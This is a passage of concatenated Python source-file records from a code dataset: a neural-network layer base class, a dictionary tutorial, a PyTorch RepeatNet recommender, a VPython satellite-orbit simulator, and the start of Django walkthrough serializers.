input_steps, num_timesteps)\n time_base: T1 Discretised time base for evolution\n input_steps: (T1xN) Discretised input signal for layer\n num_timesteps: Actual number of evolution time steps, in units of ``.dt``\n \"\"\"\n\n # - Work out how many time steps to take\n num_timesteps = self._determine_timesteps(ts_input, duration, num_timesteps)\n\n # - Generate discrete time base\n time_base = self._gen_time_trace(self.t, num_timesteps)\n\n if ts_input is not None:\n # - Make sure time series is of correct type\n if not isinstance(ts_input, TSContinuous):\n raise TypeError(\n self.start_print\n + \"`ts_input` must be of type `TSContinuous` or `None`.\"\n )\n\n # - Make sure time_base matches ts_input\n t_start_expected = time_base[0]\n t_stop_expected = time_base[-1]\n if not ts_input.periodic:\n # - If time base limits are very slightly beyond ts_input.t_start and ts_input.t_stop, match them\n if (\n ts_input.t_start - 1e-3 * self.dt\n <= t_start_expected\n <= ts_input.t_start\n ):\n t_start_expected = ts_input.t_start\n if (\n ts_input.t_stop\n <= t_stop_expected\n <= ts_input.t_stop + 1e-3 * self.dt\n ):\n t_stop_expected = ts_input.t_stop\n\n # - Warn if evolution period is not fully contained in ts_input\n if not (ts_input.contains(time_base) or ts_input.periodic):\n warn(\n \"Layer `{}`: Evolution period (t = {} to {}) \".format(\n self.name, t_start_expected, t_stop_expected\n )\n + \"is not fully contained in input signal (t = {} to {}).\".format(\n ts_input.t_start, ts_input.t_stop\n )\n + \" You may need to use a `periodic` time series.\"\n )\n\n # - Sample input trace and check for correct dimensions\n input_steps = self._check_input_dims(ts_input(time_base))\n\n # - Treat \"NaN\" as zero inputs\n input_steps[np.where(np.isnan(input_steps))] = 0\n\n else:\n # - Assume zero inputs\n input_steps = np.zeros((num_timesteps, self.size_in))\n\n return time_base, input_steps, num_timesteps\n\n def _prepare_input_events(\n self,\n ts_input: Optional[TSEvent] = None,\n duration: Optional[float] = None,\n num_timesteps: Optional[int] = None,\n ) -> Tuple[np.ndarray, np.ndarray, int]:\n \"\"\"\n Sample input from a :py:class:`TSEvent` time series, set up evolution time base\n\n This function checks an input signal, and prepares a discretised time base according to the time step of the current layer\n\n :param Optional[TSEvent] ts_input: TimeSeries of TxM or Tx1 Input signals for this layer\n :param Optional[float] duration: Duration of the desired evolution, in seconds. If not provided, then either ``num_timesteps`` or the duration of ``ts_input`` will determine evolution itme\n :param Optional[int] num_timesteps: Number of evolution time steps, in units of ``.dt``. If not provided, then either ``duration`` or the duration of ``ts_input`` will determine evolution time\n\n :return (ndarray, ndarray, int):\n time_base: T1X1 vector of time points -- time base for the rasterisation\n spike_raster: Boolean or integer raster containing spike information. T1xM array\n num_timesteps: Actual number of evolution time steps, in units of ``.dt``\n \"\"\"\n\n # - Work out how many time steps to take\n num_timesteps = self._determine_timesteps(ts_input, duration, num_timesteps)\n\n # - Generate discrete time base\n time_base = self._gen_time_trace(self.t, num_timesteps)\n\n # - Extract spike timings and channels\n if ts_input is not None:\n # - Make sure time series is of correct type\n if not isinstance(ts_input, TSEvent):\n raise TypeError(\n self.start_print + \"`ts_input` must be of type `TSEvent` or `None`.\"\n )\n\n # Extract spike data from the input variable\n spike_raster = ts_input.raster(\n dt=self.dt,\n t_start=self.t,\n num_timesteps=np.size(time_base),\n channels=np.arange(self.size_in),\n add_events=(self.add_events if hasattr(self, \"add_events\") else False),\n )\n\n else:\n spike_raster = np.zeros((np.size(time_base), self.size_in))\n\n # - Check for correct input dimensions\n spike_raster = self._check_input_dims(spike_raster)\n\n return time_base, spike_raster, num_timesteps\n\n def _check_input_dims(self, inp: np.ndarray) -> np.ndarray:\n \"\"\"\n Verify if dimensions of an input matches this layer instance\n\n If input dimension == 1, scale it up to self._size_in by repeating signal.\n\n :param ndarray inp: ArrayLike containing input data\n\n :return ndarray: ``inp``, possibly with dimensions repeated\n \"\"\"\n # - Replicate input data if necessary\n if inp.ndim == 1 or (inp.ndim > 1 and inp.shape[1]) == 1:\n if self.size_in > 1:\n warn(\n f\"Layer `{self.name}`: Only one channel provided in input - will \"\n + f\"be copied to all {self.size_in} input channels.\"\n )\n inp = np.repeat(inp.reshape((-1, 1)), self._size_in, axis=1)\n else:\n # - Check dimensionality of input\n assert (\n inp.shape[1] == self._size_in\n ), \"Layer `{}`: Input dimensionality {} does not match layer input size {}.\".format(\n self.name, inp.shape[1], self._size_in\n )\n\n # - Return possibly corrected input\n return inp\n\n def _gen_time_trace(self, t_start: float, num_timesteps: int) -> np.ndarray:\n \"\"\"\n Generate a time trace starting at ``t_start``, of length ``num_timesteps + 1`` with time step length :py:attr:`._dt`\n\n :param float t_start: Start time, in seconds\n :param int num_timesteps: Number of time steps to generate, in units of ``.dt``\n\n :return (ndarray): Generated time trace\n \"\"\"\n # - Generate a trace\n time_trace = np.arange(num_timesteps) * self.dt + t_start\n\n return time_trace\n\n def _expand_to_shape(\n self, inp, shape: tuple, var_name: str = \"input\", allow_none: bool = True\n ) -> np.ndarray:\n \"\"\"\n Replicate out a scalar to an array of shape ``shape``\n\n :param Any inp: scalar or array-like of input data\n :param Tuple[int] shape: tuple defining array shape that input should be expanded to\n :param Optional[str] var_name: Name of the variable to include in error messages. Default: \"input\"\n :param Optional[bool] allow_none: If ``True``, then ``None`` is permitted as argument for ``inp``. Otherwise an error will be raised. Default: ``True``, allow ``None``\n\n :return ndarray: ``inp``, replicated to the correct shape\n\n :raises AssertionError: If ``inp`` is shaped incompatibly to be replicated to the desired shape\n :raises AssertionError: If ``inp`` is ``None`` and ``allow_none`` is ``False``\n \"\"\"\n if not allow_none:\n assert inp is not None, \"Layer `{}`: `{}` must not be None\".format(\n self.name, var_name\n )\n\n total_size = reduce(lambda m, n: m * n, shape)\n\n if np.size(inp) == 1:\n # - Expand input to full size\n inp = np.repeat(inp, total_size)\n\n assert (\n np.size(inp) == total_size\n ), \"Layer `{}`: `{}` must be a scalar or have {} elements\".format(\n self.name, var_name, total_size\n )\n\n # - Return object of correct shape\n return np.reshape(inp, shape)\n\n def _expand_to_size(\n self, inp, size: int, var_name: str = \"input\", allow_none: bool = True\n ) -> np.ndarray:\n \"\"\"\n Replicate out a scalar to a desired size\n\n :param Any inp: scalar or array-like\n :param int size: Size that input should be expanded to\n :param Optional[str] var_name: Name of the variable to include in error messages. Default: \"input\"\n :param Optional[bool] allow_none: If ``True``, allow None as a value for ``inp``. Otherwise and error will be raised. Default: ``True``, allow ``None``\n\n :return ndarray: Array of ``inp``, possibly expanded to the desired size\n\n :raises AssertionError: If ``inp`` is incompatibly shaped to expand to the desired size\n :raises AssertionError: If ``inp`` is ``None`` and ``allow_none`` is ``False``\n \"\"\"\n return self._expand_to_shape(inp, (size,), var_name, allow_none)\n\n def _expand_to_net_size(\n self, inp, var_name: str = \"input\", allow_none: bool = True\n ) -> np.ndarray:\n \"\"\"\n Replicate out a scalar to the size of the layer\n\n :param Any inp: scalar or array-like\n :param Optional[str] var_name: Name of the variable to include in error messages. Default: \"input\"\n :param Optionbal[bool] allow_none: If ``True``, allow ``None`` as a value for ``inp``. Otherwise an error will be raised. Default: ``True``, allow ``None``\n\n :return ndarray: Values of ``inp``, replicated out to the size of the current layer\n\n :raises AssertionError: If ``inp`` is incompatibly sized to replicate out to the layer size\n :raises AssertionError: If ``inp`` is ``None``, and ``allow_none`` is ``False``\n \"\"\"\n return self._expand_to_shape(inp, (self.size,), var_name, allow_none)\n\n def _expand_to_weight_size(\n self, inp, var_name: str = \"input\", allow_none: bool = True\n ) -> np.ndarray:\n \"\"\"\n Replicate out a scalar to the size of the layer's weights\n\n :param Any inp: scalar or array-like\n :param Optional[str] var_name: Name of the variable to include in error messages. Default: \"input\"\n :param Optionbal[bool] allow_none: If ``True``, allow ``None`` as a value for ``inp``. Otherwise an error will be raised. Default: ``True``, allow ``None``\n\n :return ndarray: Values of ``inp``, replicated out to the size of the current layer\n\n :raises AssertionError: If ``inp`` is incompatibly sized to replicate out to the layer size\n :raises AssertionError: If ``inp`` is ``None``, and ``allow_none`` is ``False``\n \"\"\"\n return self._expand_to_shape(inp, (self.size, self.size), var_name, allow_none)\n\n ### --- String representations\n\n def __str__(self):\n return '{} object: \"{}\" [{} {} in -> {} internal -> {} {} out]'.format(\n self.__class__.__name__,\n self.name,\n self.size_in,\n self.input_type.__name__,\n self.size,\n self.size_out,\n self.output_type.__name__,\n )\n\n def __repr__(self):\n return self.__str__()\n\n ### --- State evolution methods\n\n @abstractmethod\n def evolve(\n self,\n ts_input: Optional[TimeSeries] = None,\n duration: Optional[float] = None,\n num_timesteps: Optional[int] = None,\n ) -> TimeSeries:\n \"\"\"\n Abstract method to evolve the state of this layer\n\n This method must be overridden to produce a concrete :py:class:`Layer` subclass. The :py:class:`evolve` method is the main interface for simulating a layer. It must accept an input time series which determines the signals injected into the layer as input, and return an output time series representing the output of the layer.\n\n :param Optional[TimeSeries] ts_input: (TxM) External input trace to use when evolving the layer\n :param Optional[float] duration: Duration in seconds to evolve the layer. If not provided, then ``num_timesteps`` or the duration of ``ts_input`` is used to determine evolution time\n :param Optional[int] num_timesteps: Number of time steps to evolve the layer, in units of ``.dt``. If not provided, then ``duration`` or the duration of ``ts_input`` is used to determine evolution time\n\n :return TimeSeries: (TxN) Output of this layer\n \"\"\"\n pass\n\n # @abstractmethod\n # def stream(self,\n # duration: float,\n # dt: float,\n # verbose: bool = False,\n # ) -> TimeSeries:\n # \"\"\"\n # stream - Abstract method to evolve the state of this layer, in a streaming format\n #\n # :param duration: float Total duration to be streamed\n # :param dt: float Streaming time-step (multiple of layer.dt)\n #\n # :yield TimeSeries raw tuple representation on each time step\n # \"\"\"\n # pass\n\n def reset_time(self):\n \"\"\"\n Reset the internal clock of this layer to 0\n \"\"\"\n self._timestep = 0\n\n def randomize_state(self):\n \"\"\"\n Randomize the internal state of this layer\n\n Unless overridden, this method randomizes the layer state based on the current state, using a Normal distribution with std. dev. of 20% of the current state values\n \"\"\"\n # create random initial state with a gaussian distribution with mean the values that were given and std the 20% of the absolute value\n self.state = np.random.normal(\n self.state, np.abs(self.state) * 0.02, size=(self.size,)\n )\n\n def reset_all(self):\n \"\"\"\n Reset both the internal clock and the internal state of the layer\n \"\"\"\n self.reset_time()\n self.reset_state()\n\n @abstractmethod\n def to_dict(self) -> Dict:\n \"\"\"\n Convert parameters of this layer to a dict if they are relevant for reconstructing an identical layer\n\n The base class :py:class:`.Layer` configures the dictionary, by storing attributes :py:attr:`~.Layer.weights`; :py:attr:`~.Layer.dt`; :py:attr:`~.Layer.noise_std`; :py:attr:`~.Layer.name`; and :py:attr:`~.Layer.class_name`. To enable correct saving / loading of your derived :py:class:`.Layer` subclass, you should first call :py:meth:`self.super().to_dict` and then store all additional arguments to :py:meth:`__init__` required by your class to instantiate an identical object.\n\n :return Dict: A dictionary that can be used to reconstruct the layer\n \"\"\"\n config = {}\n if isinstance(self.weights, np.ndarray):\n config[\"weights\"] = self.weights.tolist()\n else:\n config[\"weights\"] = self.weights\n\n config[\"dt\"] = self.dt\n config[\"noise_std\"] = self.noise_std\n config[\"name\"] = self.name\n\n config[\"class_name\"] = self.class_name\n\n return config\n\n def save(self, config: Dict, filename: str):\n \"\"\"\n Save a set of parameters to a ``json`` file\n\n :param Dict config: Dictionary of attributes to be saved\n :param str filename: Path of file where parameters are stored\n \"\"\"\n with open(filename, \"w\") as f:\n json.dump(config, f)\n\n def save_layer(self, filename: str):\n \"\"\"\n Obtain layer paramters from `.to_dict` and save in a ``json`` file\n\n :param str filename: Path of file where parameters are to be stored\n \"\"\"\n config = self.to_dict()\n assert isinstance(config, dict), (\n self.start_print\n + \"This should not have happened. If you encounter this statement, please \"\n + f\"the developers of this package. ({self.class_name})\"\n )\n self.save(config, filename)\n\n @classmethod\n def load_from_file(cls: Any, filename: str, **kwargs) -> \"cls\":\n \"\"\"\n Generate an instance of a :py:class:`.Layer` subclass, with parameters loaded from a file\n\n :param Any cls: A :py:class:`.Layer` subclass. This class will be used to reconstruct a layer based on the parameters stored in `filename`\n :param str filename: Path to the file where parameters are stored\n :param kwargs: Any keyword arguments of the class `.__init__` method where the parameter stored in the file should be overridden\n\n :return `.Layer`: Instance of `.Layer` subclass with parameters loaded from ``filename``\n \"\"\"\n # - Load dict from file\n with open(filename, \"r\") as f:\n config = json.load(f)\n\n # - Instantiate new class member from dict\n return cls.load_from_dict(config, **kwargs)\n\n @classmethod\n def load_from_dict(cls: Any, config: Dict, **kwargs) -> \"cls\":\n \"\"\"\n Generate instance of a :py:class:`.Layer` subclass with parameters loaded from a dictionary\n\n :param Any cls: A :py:class:`.Layer` subclass. This class will be used to reconstruct a layer based on the parameters stored in ``filename``\n :param Dict config: Dictionary containing parameters of a :py:class:`.Layer` subclass\n :param kwargs: Any keyword arguments of the class :py:meth:`.__init__` method where the parameters from ``config`` should be overridden\n\n :return `.Layer`: Instance of `.Layer` subclass with parameters from ``config``\n \"\"\"\n # - Overwrite parameters with kwargs\n config = dict(config, **kwargs)\n\n # - Remove class name from dict\n config.pop(\"class_name\")\n return cls(**config)\n\n def reset_state(self):\n \"\"\"\n Reset the internal state of this layer\n\n Sets `.state` attribute to all zeros\n \"\"\"\n self.state = np.zeros(self.size)\n\n #### --- Properties\n\n @property\n def class_name(self) -> str:\n \"\"\"\n (str) Class name of ``self``\n \"\"\"\n # - Determine class name by removing \"<class '\" and \"'>\" and the package information\n return str(self.__class__).split(\"'\")[1].split(\".\")[-1]\n\n @property\n def start_print(self):\n \"\"\"\n (str) Return a string containing the layer subclass name and the layer `.name` attribute\n \"\"\"\n return f\"{self.class_name} '{self.name}': \"\n\n @property\n def output_type(self):\n \"\"\"\n (Type[TimeSeries]) Output :py:class:`.TimeSeries` subclass emitted by this layer.\n \"\"\"\n return TSContinuous\n\n @property\n def input_type(self):\n \"\"\"\n (Type[TimeSeries]) Input :py:class:`.TimeSeries` subclass accepted by this layer.\n \"\"\"\n return TSContinuous\n\n @property\n def size(self) -> int:\n \"\"\"\n (int) Number of units in this layer (N)\n \"\"\"\n return self._size\n\n @property\n def size_in(self) -> int:\n \"\"\"\n (int) Number of input channels accepted by this layer (M)\n \"\"\"\n return self._size_in\n\n @property\n def size_out(self) -> int:\n \"\"\"\n (int) Number of output channels produced by this layer (O)\n \"\"\"\n return self._size_out\n\n @property\n def dt(self) -> float:\n \"\"\"\n (float) Simulation time step of this layer\n \"\"\"\n return self._dt\n\n @dt.setter\n def dt(self, fNewDt: float):\n self._dt = to_scalar(fNewDt)\n\n @property\n def weights(self) -> np.ndarray:\n \"\"\"\n (ndarray) Weights encapsulated by this layer (MxN)\n \"\"\"\n return self._weights\n\n @weights.setter\n def weights(self, new_w: np.ndarray):\n assert new_w is not None, \"Layer `{}`: weights must not be None.\".format(\n self.name\n )\n\n # - Ensure weights are at least 2D\n try:\n assert new_w.ndim >= 2\n except AssertionError:\n warn(\"Layer `{}`: `new_w must be at least of dimension 2\".format(self.name))\n new_w = np.atleast_2d(new_w)\n\n # - Check dimensionality of new weights\n if new_w.size != self.size_in * self.size:\n raise ValueError(\n self.start_print\n + f\"new_w` must be of shape {(self.size_in, self.size)}\"\n )\n\n # - Save weights with appropriate size\n self._weights = np.reshape(new_w, (self.size_in, self.size))\n\n @property\n def state(self):\n \"\"\"\n (ndarray) Internal state of this layer (N)\n \"\"\"\n return self._state\n\n @state.setter\n def state(self, new_state):\n assert (\n np.size(new_state) == self.size\n ), \"Layer `{}`: `new_state` must have {} elements\".format(self.name, self.size)\n\n self._state = new_state\n\n @property\n def noise_std(self):\n \"\"\"\n (float) Noise injected into the state of this layer during evolution\n\n This value represents the standard deviation of a white noise process. When subclassing :py:class:`Layer`, this value should be corrected by the :py:attr:`.dt` attribute\n \"\"\"\n return self._noise_std\n\n @noise_std.setter\n def noise_std(self, new_noise_std):\n self._noise_std = to_scalar(new_noise_std)\n\n @property\n def t(self):\n \"\"\"\n (float) The current evolution time of this layer\n \"\"\"\n return self._timestep * self.dt\n\n @t.setter\n def t(self, new_t):\n self._timestep = int(np.floor(new_t / self.dt))\n\n # - Temporary, for maintaining compatibility with layers that still use _t\n @property\n def _t(self):\n return self._timestep * self.dt\n\n @_t.setter\n def _t(self, new_t):\n self._timestep = int(np.floor(new_t / self.dt))\n","repo_name":"synsense/rockpool","sub_path":"rockpool/nn/layers/layer.py","file_name":"layer.py","file_ext":"py","file_size_in_byte":30138,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"3"} +{"seq_id":"23043675911","text":"'''\n dicitionary : which is contain key and value ia a pair\n\n syntax : \n\n dictionary_name = {\n \"key\" : value,\n \"key2\": value,\n .\n .\n }\n'''\n\n# student dicitionary here.\nstudent={\n \"name\":\"raj\",\n \"subject\" : \"python\",\n \"mark\" : 85,\n}\n\nprint(student)\n\n# proper formated display dicitionary\n\nfor k,v in student.items():\n print(f\"{k} = {v}\")","repo_name":"RKPatel24/R.K_Patel","sub_path":"Python/Daily Task/Python/dicitionary_example.py","file_name":"dicitionary_example.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16026834962","text":"import torch.nn as nn\nfrom torch.nn.parameter import Parameter\nimport torch\nfrom Common.BilinearAttention import *\n\ndef gru_forward(gru, input, lengths, state=None, batch_first=True):\n gru.flatten_parameters()\n input_lengths, perm = torch.sort(lengths, descending=True)\n\n input = input[perm]\n if state is not None:\n state = state[perm].transpose(0, 1).contiguous()\n\n total_length=input.size(1)\n if not batch_first:\n input = input.transpose(0, 1) # B x L x N -> L x B x N\n packed = torch.nn.utils.rnn.pack_padded_sequence(input, input_lengths, batch_first)\n\n outputs, state = gru(packed, state)\n outputs, output_lengths = torch.nn.utils.rnn.pad_packed_sequence(outputs, batch_first=batch_first, total_length=total_length) # unpack (back to padded)\n\n _, perm = torch.sort(perm, descending=False)\n if not batch_first:\n outputs = outputs.transpose(0, 1)\n outputs=outputs[perm]\n state = state.transpose(0, 1)[perm]\n\n return outputs, state\n\ndef build_map(b_map, max=None):\n batch_size, b_len = b_map.size()\n if max is None:\n max=b_map.max() + 1\n if torch.cuda.is_available():\n b_map_ = torch.cuda.FloatTensor(batch_size, b_len, max).fill_(0)\n else:\n b_map_ = torch.zeros(batch_size, b_len, max)\n b_map_.scatter_(2, b_map.unsqueeze(2), 1.)\n # b_map_[:, :, 0] = 0.\n b_map_.requires_grad=False\n return b_map_\n\nclass RepeatNet(nn.Module):\n def __init__(self, embedding_size, hidden_size, item_vocab_size):\n super(RepeatNet, self).__init__()\n\n self.embedding_size=embedding_size\n self.hidden_size=hidden_size\n self.item_vocab_size=item_vocab_size\n\n self.item_emb = nn.Embedding(item_vocab_size, embedding_size, padding_idx=0)\n\n self.enc = nn.GRU(embedding_size, int(hidden_size / 2), num_layers=1, bidirectional=True, batch_first=True)\n\n self.mode_attn = BilinearAttention(hidden_size, hidden_size, hidden_size)\n self.mode=nn.Linear(hidden_size, 2)\n\n self.repeat_attn = BilinearAttention(hidden_size, hidden_size, hidden_size)\n self.explore_attn = BilinearAttention(hidden_size, hidden_size, hidden_size)\n self.explore = nn.Linear(hidden_size, item_vocab_size)\n\n def model(self, data):\n batch_size=data['item_seq'].size(0)\n mask = data['item_seq'].ne(0)\n lengths = mask.float().sum(dim=-1).long()\n\n item_seq_embs = F.dropout(self.item_emb(data['item_seq']), p=0.5, training=self.training)\n\n output, state = gru_forward(self.enc, item_seq_embs, lengths, batch_first=True)\n state = F.dropout(state, p=0.5, training=self.training)\n output = F.dropout(output, p=0.5, training=self.training)\n\n explore_feature, attn, norm_attn = self.explore_attn(state.reshape(batch_size, -1).unsqueeze(1), output, output, mask=mask.unsqueeze(1))\n p_explore = self.explore(explore_feature.squeeze(1))\n explore_mask=torch.bmm((data['item_seq']>0).float().unsqueeze(1), data['source_map']).squeeze(1)\n p_explore = p_explore.masked_fill(explore_mask.bool(), float('-inf')) # not sure we need to mask this out, depends on experiment results\n p_explore = F.softmax(p_explore, dim=-1)\n\n _, p_repeat = self.repeat_attn.score(state.reshape(batch_size, -1).unsqueeze(1), output, mask=mask.unsqueeze(1))\n p_repeat=torch.bmm(p_repeat, data['source_map']).squeeze(1)\n\n mode_feature, attn, norm_attn = self.mode_attn(state.reshape(batch_size, -1).unsqueeze(1), output, output, mask=mask.unsqueeze(1))\n p_mode=F.softmax(self.mode(mode_feature.squeeze(1)), dim=-1)\n\n p = p_mode[:, 0].unsqueeze(-1)*p_explore + p_mode[:, 1].unsqueeze(-1)*p_repeat\n\n return p\n\n def do_train(self, data):\n scores=self.model(data)\n loss = F.nll_loss((scores+1e-8).log(), data['item_tgt'].reshape(-1), ignore_index=0)#0 is used as padding\n return loss\n\n def do_infer(self, data):\n scores = self.model(data)\n scores, index=torch.sort(scores, dim=-1, descending=True)\n return scores, index\n\n def forward(self, data, method='mle_train'):\n data['source_map'] = build_map(data['item_seq'], max=self.item_vocab_size)\n if method == 'train':\n return self.do_train(data)\n elif method == 'infer':\n return self.do_infer(data)","repo_name":"PengjieRen/RepeatNet-pytorch","sub_path":"RepeatNet/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":4358,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"3"} +{"seq_id":"12718336709","text":"from utils import *\nfrom visual import *\nimport numpy as np\n\nclass AxisVis(frame):\n \"\"\"Visualize a set of 3d axes as colored perpinecular arrows.\"\"\"\n def __init__(self,arrowlen,shaftwidth='auto',pos=(0,0,0),standard=True):\n frame.__init__(self)\n if standard:\n x=(arrowlen,0,0)\n y=(0,arrowlen,0)\n z=(0,0,arrowlen)\n self.pos = pos\n if shaftwidth == 'auto':\n shaftwidth = max(arrowlen/100,2e4)\n self.arrows={}\n self.arrows['x'] = arrow(frame=self,axis=x,color=color.green)\n self.arrows['y'] = arrow(frame=self,axis=y,color=color.red)\n self.arrows['z'] = arrow(frame=self,axis=z,color=color.blue)\n for a in self.arrows.values():\n a.shaftwidth = shaftwidth\n\n\nclass SatVis(AxisVis):\n \"\"\"This is for visualizing the orientation and field of view of a satellite.probably a temporary class.? \"\"\"\n def __init__(self,gain,length,arrowlen,shaftwidth='auto',cam_gain=0,pos=(0,0,0),standard=True):\n AxisVis.__init__(self,arrowlen,shaftwidth,pos,standard)\n r = np.tan(gain/2) * length\n a = np.asarray(self.arrows['x'].axis)\n r_cam = np.tan(cam_gain/2)*length\n self.ax = a\n self.length = length\n self.gain = gain\n self.cam_gain=cam_gain\n a/=mag(a)\n self.fov_cone=cone(frame=self,length=length,radius=r,axis=-a,opacity=0.15, pos=a*length,color=color.orange)\n self.camera_pyramid = pyramid(frame=self,axis=-a,size=(length,r_cam,1e5),pos=a*length,color=color.blue,opacity=0.3)\n self.mainbox = box(frame=self,pos=(0,0,0),size=(1e5,1e5,1e5))\n\n def set_gain(self,gain):\n self.gain = gain\n r = np.tan(gain / 2) * self.length\n self.fov_cone.radius = r\n\n def set_cam_gain(self,gain):\n self.cam_gain = gain\n r = np.tan(gain / 2) * self.length\n csize = self.camera_pyramid.size\n csize[1] = r\n self.camera_pyramid.size = csize\n\n def set_length(self,new_length):\n \"\"\"Set the length of the displayed cone/pyramids \"\"\"\n self.length = new_length\n self.camera_pyramid.pos = self.ax*self.length\n self.fov_cone.length = new_length\n self.camera_pyramid.length=new_length\n self.fov_cone.pos = self.ax*self.length\n self.set_gain(self.gain)\n self.set_cam_gain(self.cam_gain)\n\nclass Satellite(object):\n \"\"\"Satellite utility class\"\"\"\n def __init__(self,orbit,earth,capacity=35400.0,orientation=(1,0,0),timestep=1,\n mass=8,dim=(0.1,0.2,0.3),antenna_gain=0):\n self.orbit = orbit\n self.earth = earth\n self.t = 0\n self.current_orient = orientation\n self.current_coord = self.orbit.r0\n self.spanel_offset = np.asarray((-1,0,1))\n self.efficiency = 0.21\n self.area = 0.3 * 0.1 #area of solar panel in square metres\n self.timestep = timestep\n self.antenna_gain = antenna_gain\n self.cam_gain = 0\n self.currently_collecting = True\n self.currently_transmitting = {}#dict to store all locations tras\n self.capacity = capacity\n self.current_battery = capacity\n self.mass = mass #satellite mass in kg\n self.dim = np.asarray(dim)#dimensions of cuboid satellite in metres\n\n\n def energy_recieved(self):\n \"\"\"Gives the energy recieved at time t with orbit orbit. Think this should work?\"\"\"\n radiance = self.orbit.radiance_at_coord(self.current_coord,self.t)\n sundir=self.orbit.sun_coords_at(self.t)\n sat_to_sun = sundir - self.current_coord\n solar_orient = self.current_orient + self.spanel_offset\n p = np.dot(sundir,solar_orient)/(mag(sundir)*mag(solar_orient))\n #p = np.cos(angle_between(sundir,solar_orient))\n #p=1\n p=abs(p)\n p*= radiance\n #print(\"dot product:{}\".format(p))\n p *= self.efficiency\n p *= self.area\n #print(\"final power:\"+str(p))\n e = p * self.timestep\n return e\n\n def energy_used(self):\n p = 1 #1 watt intermittent power use\n if self.currently_transmitting != {}:\n p += 5\n if self.currently_collecting:\n p += 3\n e = p * self.timestep\n return e\n\n def power_balance(self):\n self.e_in = self.energy_recieved()\n\n self.e_out = self.energy_used()\n #print(\"e_in: {}, e_out: {}\".format(self.e_in,self.e_out))\n self.current_battery += (self.e_in - self.e_out)\n #print(self.current_battery)\n if self.current_battery > self.capacity:\n self.current_battery = self.capacity\n if self.current_battery <= 0:\n pass\n\n def communication_possible(self,coord):\n \"\"\"Determines if the satellite can make contact with a given coord\"\"\"\n\n sat_to_coord = np.asarray(coord) - self.current_coord#vector from satellite to coord\n if angle_between(self.current_orient, sat_to_coord) <= self.antenna_gain/2:\n if not passes_through_earth(self.current_coord,coord):\n return True\n return False\n\n def simulate_comms(self):\n \"\"\"simulate_comms \"\"\"\n self.currently_transmitting = {}\n for place in self.earth.labels.keys():\n place_coord = self.earth.frame.frame_to_world(self.earth.labels[place].pos)\n if self.communication_possible(place_coord):\n self.currently_transmitting[place] = place_coord\n\n def perform_timestep(self):\n \"\"\"do one timestep and update the satellite's state. \"\"\"\n self.current_coord = np.asarray(self.orbit.t_to_xyz(self.t))\n self.simulate_comms()\n #TEMPORARY - REPLACE WITH POLICY SETTER SOON.\n #(this just always points to earth's center)\n self.current_orient = np.asarray(self.current_coord) * -1\n self.power_balance()\n self.t += self.timestep\n\n\n\n\n\nclass SatelliteVis(Satellite):\n def __init__(self,orbit,earth,capacity=35400,orientation=(1,0,0),timestep=1,\n mass=8,dim=(0.1,0.2,0.3),antenna_gain=0):\n Satellite.__init__(self,orbit,earth,capacity,orientation,timestep,mass,dim,antenna_gain)\n self.vis = SatVis(length=orbit.a,gain=self.antenna_gain,pos=self.orbit.r0,arrowlen=5e5)\n self.comm_lines = {}\n self.display_string = \"Ready for use\"\n self.hud = label(pos=(0,0,0),xoffset=-310,yoffset=100,text=self.display_string,line=False)\n self.e_in=0\n self.e_out=0\n\n def perform_timestep(self):\n super(SatelliteVis,self).perform_timestep()\n #self.vis.pos = self.current_coord\n self.vis.axis = self.current_orient\n self.set_pos(self.current_coord)\n #delete any lines from other timesteps\n #draw line from satellite to any points making communication\n for line in self.comm_lines.values():\n line.visible=False\n\n for place in self.currently_transmitting.keys():\n place_coord = self.currently_transmitting[place]\n self.comm_lines[place] = curve(pos=[self.current_coord, place_coord],\n color=color.cyan)\n self.hud.text = self.get_display_string()\n\n def get_display_string(self):\n disp_string = 'Date/time: ' + str(self.earth.datetime_at(self.t))\n disp_string += \"\\nCurrent coord:{:.0f} {:.0f} {:.0f} \".format(*self.current_coord)\n disp_string += \"\\nBattery: {:.1f}%\".format(self.current_battery/self.capacity * 100)\n disp_string += \"\\nPower in: {:.1f} W\".format(self.e_in/self.timestep)\n disp_string += \"\\nPower used: {} W\".format(self.e_out / self.timestep)\n\n if self.currently_transmitting == {}:\n disp_string += \"\\nNo communication with earth.\"\n else:\n disp_string += \"\\nTransmitting data to points:\"\n for place in self.currently_transmitting.keys():\n disp_string += \"\\n \" + place\n return disp_string\n\n def set_gain(self,gain):\n self.antenna_gain = gain\n self.vis.set_gain(gain)\n\n def set_cam_gain(self,gain):\n self.cam_gain=gain\n self.vis.set_cam_gain(gain)\n\n def set_pos(self,new_pos):\n self.vis.pos = new_pos\n self.current_coord = new_pos\n #if self.t % self.timestep * 150 == 0:\n # self.vis.set_length(mag(self.current_coord))\n\n def set_orbit(self,new_orbit):\n self.orbit = new_orbit\n self.set_pos(self.orbit.t_to_xyz(self.t))\n\n def toggle_collection(self):\n self.currently_collecting = not self.currently_collecting\n self.vis.camera_pyramid.visible = not self.vis.camera_pyramid.visible\n","repo_name":"sorenbouma/Python-Orbit-Visualization","sub_path":"sat.py","file_name":"sat.py","file_ext":"py","file_size_in_byte":8646,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"17323562983","text":"from django.core.exceptions import ValidationError\nfrom django.core.validators import MinLengthValidator, URLValidator\nfrom rest_framework import serializers\n\nfrom trcustoms.common.fields import CustomCharField\nfrom trcustoms.levels.models import Level\nfrom trcustoms.levels.serializers import LevelNestedSerializer\nfrom trcustoms.mails import send_walkthrough_update_mail\nfrom trcustoms.tasks import update_awards\nfrom trcustoms.uploads.serializers import UploadedFileNestedSerializer\nfrom trcustoms.users.serializers import UserNestedSerializer\nfrom trcustoms.walkthroughs.consts import WalkthroughStatus, WalkthroughType\nfrom trcustoms.walkthroughs.models import Walkthrough\n\n\nclass WalkthroughAuthorSerializer(UserNestedSerializer):\n picture = UploadedFileNestedSerializer(read_only=True)\n\n class Meta:\n model = UserNestedSerializer.Meta.model\n fields = UserNestedSerializer.Meta.fields + [\n \"picture\",\n ]\n\n\nclass WalkthroughListingSerializer(serializers.ModelSerializer):\n author = WalkthroughAuthorSerializer(\n read_only=True,\n default=serializers.CreateOnlyDefault(\n serializers.CurrentUserDefault()\n ),\n )\n level = LevelNestedSerializer(read_only=True)\n 